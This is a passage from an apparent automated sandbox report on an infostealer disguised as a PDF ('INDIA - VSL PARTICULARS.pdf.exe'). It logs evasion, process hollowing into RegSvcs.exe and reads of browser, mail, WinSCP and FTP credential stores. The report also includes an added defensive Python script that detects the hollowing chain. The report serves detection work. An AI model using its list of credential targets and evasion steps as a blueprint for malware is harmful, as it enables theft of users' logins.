    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597735
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597610
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597485
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597360
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597235
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597110
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596985
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596860
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596719
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596609
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596500
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596391
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596266
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596141
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596031
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595922
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595813
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595688
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595563
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595453
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595344
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595219
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595110
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594985
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594860
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594735
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594610
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594485
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594330
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594200
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594016
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593888
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593782
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593657
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 593532
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 600000
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599875
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599766
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599656
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599547
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599438
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599324
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599215
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 599109
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598973
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598849
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598719
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598609
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598500
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598391
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598281
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598171
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 598062
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597953
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597844
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597734
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597625
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597516
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597391
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597266
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597156
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 597047
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596937
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596828
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596719
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596609
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596500
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596384
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596273
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596166
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 596047
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595937
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595828
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595719
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595609
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595500
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595391
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595266
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595141
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 595031
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594922
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594813
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594688
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594563
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594453
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 594344
    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\
    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
    Source: C:\Windows\System32\wscript.exe File opened: C:\Users\user\AppData\
    Source: name.exe, 00000006.00000002.2366368465.0000000000BE8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: War&Prod_VMware_SATA_CD00#
    Source: name.exe, 00000008.00000002.2403136612.00000000008F8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}q
    Source: wscript.exe, 00000005.00000002.2319453787.000001C4F23E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe API call chain: ExitProcess graph end node
    Source: C:\Users\user\AppData\Local\directory\name.exe API call chain: ExitProcess graph end node
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_0045A370 BlockInput
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_0040EBD0 LoadLibraryA,GetProcAddress
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_03F1F338 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_03F20A08 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_03F209A8 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_03FD1EB0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_03FD3520 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 2_2_03FD3580 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_03F1E6A0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_03F1FD70 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_03F1FD10 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_03F91EB0 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_03F93520 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 8_2_03F93580 mov eax, dword ptr fs:[00000030h]
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_004238DA __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_0041F250 SetUnhandledExceptionFilter
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0041F250 SetUnhandledExceptionFilter
    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_0041A208 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess
    Source: C:\Users\user\AppData\Local\directory\name.exe Code function: 6_2_00417DAA IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Memory allocated: page read and write | page guard

    HIPS / PFW / Operating System Protection Evasion

    Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
    Source: C:\Users\user\AppData\Local\directory\name.exe Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write
    Source: C:\Users\user\AppData\Local\directory\name.exe Section unmapped: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base address: 400000
    Source: C:\Users\user\AppData\Local\directory\name.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 91C008
    Source: C:\Users\user\AppData\Local\directory\name.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: DA8008
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_00436CD7 LogonUserW
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_0040D590 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_00434418 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_0043333C __wcsicoll,mouse_event,__wcsicoll,mouse_event
    Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"
    Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\directory\name.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\AppData\Local\directory\name.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\directory\name.exe"
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_00446124 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
    Source: INDIA - VSL PARTICULARS.pdf.exe, name.exe Binary or memory string: Shell_TrayWnd
    Source: INDIA - VSL PARTICULARS.pdf.exe, name.exe.0.dr Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_004720DB GetLocalTime,__swprintf,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW,SHGetFolderPathW
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_00472C3F GetUserNameW
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_0041E364 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Code function: 0_2_0040E500 GetVersionExW,GetCurrentProcess,GetNativeSystemInfo,FreeLibrary,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,FreeLibrary
    Source: C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
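The process-creation lines in this section are the sandbox's record of the hollowing chain: wscript.exe starts name.exe from AppData, name.exe maps an executable section into a fresh RegSvcs.exe, unmaps the original image at base 400000 and writes its payload, and the new RegSvcs.exe process carries name.exe's (or the original sample's) path as its command line. That last detail is visible to any endpoint telemetry that logs process creation, because the creating process chooses the command line but not the image that actually runs. The following is an added example, not part of the Joe Sandbox report, that encodes these tells as checks over constructed Sysmon-style ProcessCreate records (field names follow Sysmon Event ID 1, values mirror the report's process tree; the devenv.exe control record, the list of .NET host binaries and the user-writable path patterns are assumptions for illustration):

```python
"""Checks for the process-creation tells of the hollowing chain above.

Added example: the records below are constructed in the shape of Sysmon
Event ID 1 (ProcessCreate) fields and mirror the report's process tree;
they are not captured telemetry.
"""
import ntpath
import re

# .NET framework utilities commonly picked as hollowing hosts (assumed list).
DOTNET_HOSTS = {"regsvcs.exe", "regasm.exe", "installutil.exe",
                "msbuild.exe", "aspnet_compiler.exe", "applaunch.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Directories an unprivileged user can write to (assumed patterns).
USER_WRITABLE = re.compile(
    r"\\users\\[^\\]+\\(appdata|desktop|downloads|documents)\\"
    r"|\\windows\\temp\\|\\programdata\\", re.I)
# A document-looking name followed by an executable extension.
DOUBLE_EXT = re.compile(
    r"\.(pdf|doc|docx|xls|xlsx|ppt|pptx|jpg|png|txt|zip)\.(exe|scr|com)$", re.I)

MISMATCH = "image/command-line mismatch (hollowing tell)"
DOTNET_FROM_USER_DIR = "dotnet host spawned by binary in user-writable path"
SCRIPT_DROPPER = "script host launched exe from user-writable path"
DOUBLE_EXTENSION = "double extension"


def first_token(cmdline: str) -> str:
    """Executable part of a Windows command line (quoted or bare)."""
    cmdline = cmdline.strip()
    if cmdline.startswith('"'):
        end = cmdline.find('"', 1)
        return cmdline[1:end] if end > 0 else cmdline[1:]
    return cmdline.split(" ", 1)[0]


def check(event: dict) -> list:
    """Return the rule names that fire for one ProcessCreate record."""
    image = ntpath.basename(event["Image"]).lower()
    parent = ntpath.basename(event["ParentImage"]).lower()
    claimed = ntpath.basename(first_token(event["CommandLine"])).lower()
    hits = []
    # The hollowed process runs RegSvcs.exe but its command line names the
    # injector's own file: the creator chose the command line, not the image.
    if claimed and claimed != image:
        hits.append(MISMATCH)
    # A framework utility started by something living under AppData/Desktop.
    if image in DOTNET_HOSTS and USER_WRITABLE.search(event["ParentImage"]):
        hits.append(DOTNET_FROM_USER_DIR)
    # wscript/cscript starting an .exe that its script just dropped.
    if (parent in SCRIPT_HOSTS and image.endswith(".exe")
            and USER_WRITABLE.search(event["Image"])):
        hits.append(SCRIPT_DROPPER)
    if DOUBLE_EXT.search(event["Image"]):
        hits.append(DOUBLE_EXTENSION)
    return hits


def triage(events: list) -> dict:
    """Map record index -> fired rules, for records that fired anything."""
    result = {}
    for i, event in enumerate(events):
        hits = check(event)
        if hits:
            result[i] = hits
    return result


# Constructed records modelled on the report's process tree.
EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe",
     "CommandLine": r'"C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"'},
    {"ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Users\user\AppData\Local\directory\name.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\directory\name.exe" '},
    {"ParentImage": r"C:\Users\user\AppData\Local\directory\name.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Users\user\AppData\Local\directory\name.exe"'},
    {"ParentImage": r"C:\Users\user\AppData\Local\directory\name.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Users\user\Desktop\INDIA - VSL PARTICULARS.pdf.exe"'},
    # Assumed benign control: a developer tool registering a COM assembly.
    {"ParentImage": r"C:\Program Files\Microsoft Visual Studio\devenv.exe",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" /u MyComponent.dll'},
]

if __name__ == "__main__":
    for idx, rules in triage(EVENTS).items():
        print(idx, ntpath.basename(EVENTS[idx]["Image"]), "->", rules)
```

The mismatch rule alone catches both RegSvcs.exe launches, and it does so without any knowledge of the injected payload; the other three rules reproduce the "WScript or CScript Dropper" and "Suspicious Double Extension" Sigma matches listed at the top of the report. The control record shows that a legitimate RegSvcs.exe invocation, whose command line names RegSvcs.exe itself and whose parent sits under Program Files, fires nothing.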

    Stealing of Sensitive Information

    Source: Yara match File source: dump.pcap, type: PCAP
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\FTP Navigator\Ftplist.txt
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
